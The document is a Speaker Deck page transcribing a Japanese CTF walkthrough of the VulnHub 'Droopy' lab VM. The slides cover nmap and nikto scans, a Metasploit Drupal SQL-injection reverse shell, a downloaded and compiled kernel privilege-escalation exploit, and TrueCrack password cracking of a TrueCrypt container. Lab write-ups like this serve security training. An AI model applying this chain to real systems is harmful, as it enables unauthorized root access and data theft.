Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
boot2root_kalilinux_droopy
Search
MarkUP
November 02, 2018
0
29
boot2root_kalilinux_droopy
MarkUP
November 02, 2018
Tweet
Share
More Decks by MarkUP
See All by MarkUP
OwaspZap
markup
0
88
burpsuite_badstore
markup
0
59
boot2root_kalilinux_bulldog
markup
0
22
侵入検知のファーストステップ
markup
0
660
Featured
See All Featured
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
31
2.2k
How STYLIGHT went responsive
nonsquared
100
5.7k
Git: the NoSQL Database
bkeepers
PRO
431
65k
Producing Creativity
orderedlist
PRO
347
40k
Being A Developer After 40
akosma
90
590k
Keith and Marios Guide to Fast Websites
keithpitt
411
22k
YesSQL, Process and Tooling at Scale
rocio
173
14k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
50k
Done Done
chrislema
185
16k
A designer walks into a library…
pauljervisheath
207
24k
jQuery: Nuts, Bolts and Bling
dougneiner
63
7.8k
Docker and Python
trallard
45
3.5k
Transcript
サーバ侵入手法 Droopy CTF
DroopyVM ・インストール https://download.vulnhub.com/droopy/ ・フリーソフトウェアのCMS(コンテンツ・マネジメント・システ ム)のDrupal(ドル―パル)を構築している
Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads
Virtualbox インポート
Virtualbox ネットワーク設定
Virtualbox ネットワーク設定
Virtualbox スナップショット
ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP: pingを利用してそのネットワークで現在動作している マシンの一覧を取得する事が出来る
ポートスキャン ①> nmap -A 192.168.99.101 -A:OSの種類やその他詳細なバージョン情報などを取得可能
ポートスキャン 80番ポートでDrupalが起動しているのがわかりましたので、ブラウ ザでアクセスしてみましょう。
ポートスキャン
サーバスキャン ①> nikto –h 192.168.99.101 -h:対象のIPアドレスを指定するオプション
サーバスキャン nikto
解法 Metasploit framework
Metasploit framework drupalを使用してることがわかったので、 KaliLinuxにてMSFで攻 撃を仕掛けてみる。
Metasploit framework 今回はSQLインジェクションを利用したペイロードを使用する (「set lhost ローカルホストIPアドレス」も必要かも)
Metaspliote framework 準備ができたら実行してリバースシェルを張りましょう。 shellコマンドでshellに入りましょう。
書き込み可能なディレクトリの漏洩 ①> find / -writable -type d 2>/dev/null -writable :書き込み可能
-type d :(d:ディレクトリ f:ファイル l:シンボリックリンク)
疑似端末 疑似端末を割り当てましょう。 疑似端末とは、UNIXにおけるテキスト端末の擬似デバイスのマス ター・スレーブのペアである。 python の ptyモジュールを利用することで疑似端末を制御できま す。 echo "import
pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py
①> lsb_release -a Linux OSのディストリとバージョンを確認可能だがインストール されていないと使用できない。 ②> cat /etc/issue ディストリビューション環境に関係なくディストリとバージョン
を確認することが出来ます。 OS情報の漏洩
ubuntu 14.04 既存の脆弱性を悪用する
権限昇格 • cd /tmp/ • wget https://www.exlpoit-db.com/download/37292 (KaliでDLしたファイルをwgetしないといけない) • mv
37292 37292.c • gcc 37292.c -o kernel • chmod 777 kernel • ./kernel • whoami
tcファイルのダウンロード ・cd /root ・ls -al ・cp /root/dave.tc /var/www/html/ ・Kaliでhttp://192.168.99.102/dave.tcにアクセス&DL
tcファイル TrueCryptコンテナファイルは暗号化された仮想ドライブファイ ル。 3種類の暗号化アルゴリズムと3種類のハッシュアルゴリズムを選 択できる。 普段はコンピュータ上に表示されず、必要な時だけ認識される秘 密のドライブ。 暗号化ドライブの領域を「見せかけ」と「本命」に分割できる。 このファイルのクラッキングツールとして「TrueCrack」が存在 している。
TrueCrack ①> truecrack --truecrypt dave.tc --wordlist rockyou.txt --v erbose tcファイルのパスワードクラッキングが可能
--truecrypt [file]:tcファイルの指定 --wordlist [file]:ワードリストの指定 --verbose:詳細情報の出力 https://github.com/lvaccaro/truecrack
TrueCrack rockyou.txtはワード数が多すぎるためヒントを元にワードを絞っ て実施する必要がある。 さらに、暗号化アルゴリズムの指定(-eオプション)やハッシュア ルゴリズムの指定(-kオプション)を上手く利用する必要がありま した。(デフォルトだとAESでRIPEMD-160です) ヒントは/var/mail/www-dataにありました。 "The password isn't
longer than 11 characters" "we know what academy we went to" "remember that song by The Jam"
TrueCrack
cryptsetup • cryptsetup open --type tcrypt dave.tc dave • mkdir
/media/dave • mount /dev/mapper/dave /media/dave • cd /media/dev • find . • cat .secret/.top/flag.txt